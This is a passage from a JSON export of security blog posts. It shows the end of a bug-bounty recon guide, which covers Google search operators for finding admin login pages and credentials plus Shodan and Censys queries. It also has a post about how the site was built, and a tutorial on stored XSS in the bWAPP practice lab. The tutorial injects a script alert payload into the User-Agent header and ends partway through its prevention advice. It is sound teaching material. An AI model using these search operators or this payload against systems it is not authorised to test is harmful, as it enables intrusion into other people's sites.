border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intitle:admin login</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintitle</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search Page Title</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintitle:admin page</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inurl</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search URL</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inurl:8080/login</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allinurl</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search URL</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allinurl:admin</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">filetype</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Specific Files</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">filetype: json</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intext</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search text of page only</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">intext: \"admin credentials\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintext</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search text of page only</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">allintext: \"security tools\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">site</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search specific site</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">site:example.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">link</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for links to pages</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">link:bing.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inanchor</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search link anchor text</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">inanchor:\"guest user\"</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">numrange</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Locate specific number</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">numrange:1-100</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">cache</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for cached version of any website</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">cache:www.example.com</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_all_border\" style=\"box-sizing: border-box; border: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">related</font></span></td><td class=\"blog_table_no_left_with_bottom_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); border-bottom: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" size=\"4\">Search for similar types of website</font></span></td><td class=\"blog_table_no_left_with_bottom_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); border-bottom: 1px solid rgb(209, 209, 209); padding: 0.5em;\"><span class=\"blog_description_small_normal\" style=\"box-sizing: border-box; line-height: 1.7em; color: rgb(75, 75, 75);\"><font face=\"Lora, serif\" style=\"\" size=\"4\">related:www.example.com</font></span></td></tr></tbody></table><br></font></div><div><font style=\"\"><b><font size=\"5\">9. Shodan</font></b><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\"><div>Shodan is a search engine, hackers and security researchers use to find vulnerable Internet of Things devices and querying to the engine he/she can get the device IP address, web server details, banner, ISP, SSH, FTP, TELNET and many more.</div><div><br></div><div>For hackers, it's a great playground to gather as much information from a target.</div><div><br></div></font></font></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">product<span class=\"token operator\">:</span><span class=\"token maybe-class-name\">MongoDB</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://www.shodan.io/\"><font color=\"#dd4124\"><b>https://www.shodan.io/</b></font></a></font><br></div><div><br></div><div><font size=\"5\"><b>10. Censys</b></font><br></div><div><br></div><div><font size=\"4\">Censys is a search engine which is pretty similar to Shodan, it allows hackers and security researchers to scans devices, hosts and gives an aggregate report on how the systems are configured (Certificates, Websites, etc.) and deployed. Censys is designed to find out poorly configured devices over the internet and due to it maintains a large amount of database it's very much useful to gather information for a specific target.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">www<span class=\"token punctuation\">.</span><span class=\"token property-access\">example</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://censys.io/\"><font color=\"#dd4124\"><b>https://censys.io/</b></font></a></font><br></div><div><br></div><div><span style=\"font-size: large;\">I hope you understand by now why RECON is important in Bug Bounty and I found these are the top 10 Recon tools which you can use to gather as much information for a specific target but there are also many other different tools which you can explore for information gathering, in my future tutorials I'll demonstrate those tools.</span><br></div><div><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<font face=\"Lora, serif\" size=\"4\">The article was highly appreciated by many&nbsp;<a href=\"https://en.wikipedia.org/wiki/Information_security\"><font color=\"#dd4124\">InfoSec</font></a> communities&nbsp;and featured in their platforms as top automation &amp; reconnaissance&nbsp;article for Bug Bounty.</font><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><b>Top Mentions</b></font></div><div><ul><li><font face=\"Lora, serif\" size=\"4\" color=\"#dd4124\"><a href=\"https://github.com/OWASP/Amass/blob/master/REFERENCES.md\"><font color=\"#dd4124\">OWASP Amass GitHub&nbsp;Project</font></a>&nbsp;</font><font face=\"Lora, serif\" size=\"4\">- by <a href=\"https://twitter.com/jeff_foley\"><font color=\"#dd4124\">@jeff_foley</font></a></font></li><li><font size=\"4\"><a href=\"https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/blogposts.md#automation--recon\"><font color=\"#dd4124\">Resources for Beginner Bug Bounty Hunters</font></a> -&nbsp;by <a href=\"https://twitter.com/NahamSec\"><font color=\"#dd4124\">@NahamSec</font></a></font><br></li><li><font size=\"4\"><a href=\"https://twitter.com/Alra3ees/status/1225903602717405185\"><font color=\"#dd4124\">10 Recon Tools For Bug Bounty</font></a> - by <a href=\"https://twitter.com/Alra3ees\"><font color=\"#dd4124\">@Alra3ees</font></a></font><br></li></ul><div><br></div></div>"
        },
        {
            "title": "HackbotOne - Full Stack Application",
            "blog_id": "hackbotone-full-stack-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-01-01T19:56:51.262315Z",
            "last_updated_date": "2021-06-07T21:18:20.856450Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/hackbotone-full-stack-application/large_thumbnail.png",
            "keywords": [
                "react.js",
                "node.js",
                "mongodb"
            ],
            "highlights": "HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development & GameDevelopment.",
            "description": "<b><font size=\"5\">Introduction</font></b><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development &amp; Game Development</span><span style=\"font-size: large;\">.</span><br></div><div><span style=\"font-size: large;\"><br></span></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/jUiYl1Bqe7s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">Which type of content you can expect?</font></b><br></div><div><b><br></b></div><div><b><font size=\"4\">Application Development</font></b><br></div><div><b><br></b></div><div><font size=\"4\">I will publish contents from both web &amp; mobile platforms for example - (Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more) which are related to application development I’ll try to cover those topics with step-by-step explanation and mostly in this section I'll cover programming.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Game Development</b><br></font></div><div><b><br></b></div><div><font size=\"4\">Mostly you can expect contents from Unity3d game engine platform and I'll try to make small video tutorial series with step by step explanation of every component of the game and also if I'll know some new game engine platforms then definitely you can expect write-ups on this website.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Ethical Hacking</b><br></font></div><div><font size=\"4\"><b><br></b></font></div><div><font size=\"4\">In this section mostly you can expect contents from Bug Bounty write-ups, Security Lab Exercises, Penetration testing tools and also as per my research if I'll know about latest exploits then definitely you can expect write-ups with video tutorials on this website.<br></font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How it's built?</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><div>This is a full-stack web application, it's running react.js as a front-end and Node.js as a backend and it uses MongoDB database for storage. To render the website smoothly, i use Server-side rendering technique which is a very popular technique for rendering client-side web page on the server and server will send the complete result to the client. and then client JavaScript will take control to render the page.</div><div><br></div><div>And to bundle the module I use Webpack which is a JavaScript module bundler and it bundles JavaScript, front-end assets like HTML, CSS and images and generates a static asset.</div></font></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Open Source</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><div style=\"\"><font size=\"4\">It will be quite difficult for me to walk you through step-by-step every line of codes. That's why I made the complete development open-source on my Github. So that it will be helpful for beginners and those have an interest in this area to know more about the development of this website.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\" color=\"#dd4124\"><b><a href=\"https://github.com/anshumanpattnaik/hackbotone-mern-website\"><font color=\"#dd4124\">https://github.com/anshumanpattnaik/hackbotone-mern-website</font></a></b></font><br></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">So this is the overall explanation of '<i>hackbotone.com</i>' I&nbsp;hope you will like my work if you find any types of issues like on improving codes then please feel free raise an issue on GitHub.&nbsp;</font><span style=\"font-size: large;\">So that it will be helpful for me to make the site more robust.</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (SQLiteManager & User-Agent)",
            "blog_id": "cross-site-scripting-stored-sqlitemanager-and-user-agent",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-30T19:56:42.608642Z",
            "last_updated_date": "2021-06-06T10:39:41.968408Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/large_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "Penetration Testing"
            ],
            "highlights": "This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager & User-Agent header and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager &amp; User-Agent header and for this demo, I'll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/34sk4qOuA6s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform Stored Cross-Site-Scripting attack in SQLiteManager?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (SQLiteManager)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_2.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot it shows the message that \"<i>The SQLiteManager version is vulnerable to Cross-Site Scripting!</i>\". And in the hint, the CVE no is mentioned. - (CVE-2012-5105), so let's search this no to get more information about this vulnerability.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_3.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As per the CVE report, it shows that in <b>SQLiteManager 1.2.4 version</b> there was an XSS vulnerability found and which allow remote attackers to inject arbitrary web script to the DB shell parameter in main.php and index.php files.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To get the complete report of this vulnerability please visit this link:- <a href=\"https://www.exploit-db.com/download/36510/\"><font color=\"#dd4124\"><b>36510</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">Exploit DB report</font></b><br></div><div><br></div><div><div><font size=\"4\">SQLiteManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">SQLiteManager 1.2.4 is vulnerable; other versions may also be affected. But as per their report, I don't think this vulnerability exists as it is very old. So for every application always use an updated version and also follow their forums so that you can get in touch with their developer's community to get the latest updates.</font></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">SQLiteManager Developer Communities</font></b><br></div><div><br></div><div><ul><li><font color=\"#dd4124\" size=\"4\"><b><a href=\"https://db4s.slack.com/\"><font color=\"#dd4124\">DB Browser for SQLite</font></a></b></font><br></li><li><font color=\"#dd4124\" size=\"4\"><font color=\"#dd4124\"><b><a href=\"https://twitter.com/sqlitebrowser\"><font color=\"#dd4124\">SQLiteBrowser Twitter</font></a></b></font><br></font></li><li><font color=\"#dd4124\" size=\"4\"><b><a href=\"https://github.com/sqlitebrowser/sqlitebrowser\"><font color=\"#dd4124\">SQLiteBrowser Github</font></a></b><br></font></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform Stored Cross-Site-Scripting attack in User-Agent Header?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_4.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (User-Agent)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_5.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot it's able to identify my browser version, operating system and some other details and these details stored in the database.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_6.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">So now let's intercept the request using <a href=\"https://portswigger.net/burp\"><font color=\"#dd4124\"><b>Burp Suite</b></font></a> so that you can inject JavaScript payload to the User-Agent header.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_7.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">Now go back again and choose the same option <b>Cross-site-Scripting - Stored (User-Agent)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_8.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">If you go back to the Burp Suite and follow the same steps which we follow in the <a href=\"https://hackbotone.com/blog/cross-site-scripting-stored-sqlitemanager-and-user-agent#\"><font color=\"#dd4124\"><b>reflected module</b></font></a> then you can able to see the intercept request of \"xss_stored_4.php\" file.</font><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_9.png\"><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Now let's inject the payload to the \"</span><b style=\"font-size: large;\">User-Agent</b><span style=\"font-size: large;\">\" header.</span><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_10.png\"><br></div><div><span style=\"font-size: large;\">Now if you go back to the browser then you could able to see the alert dialog box.</span><br></div><div><span style=\"font-size: large;\"><br></span></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_11.png\"><span style=\"font-size: large;\"><br></span></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot we are able to inject the JavaScript code to the <b>\"User-Agent\"</b> header. And also this payload gets stored in the database, if you go to the \"<b>phpMyAdmin</b>\" and check the \"<b>visitors</b>\" table then you could see that the payload also gets stored in the database.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-sqlitemanager-user-agent/cross_site_scripting_stored_sqlitemanager_user_agent_12.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As the payload stored in the database if you go back and come again then also the payload will be executed.</font><br></div><div><br></div><div><b><font size=\"5\">How do we prevent this attack?</font></b><br></div><div><br></div><div><ol><li><font size=\"4\">User input needs to be encoded in the HTTP header and developer can implement filters which will eliminate any scripting tags.</font><br></li><li><font size=\"4\">And in some cases, X-XSS-Protection header can prevent some 